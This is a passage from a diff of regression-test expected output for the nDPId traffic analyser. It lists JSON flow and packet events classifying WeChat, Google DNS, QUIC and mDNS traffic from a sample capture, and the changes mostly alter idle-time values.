+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167639887,"flow_last_seen":1492167639887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167639887,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1492167639887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167639887,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8T5xAAEAGxaDAqAFny82XotNhAbttdZ2FAAAAAKACchD+DQAAAgQFtAQCCAoAMdIZAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167640138,"flow_last_seen":1492167640138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167640138,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"} 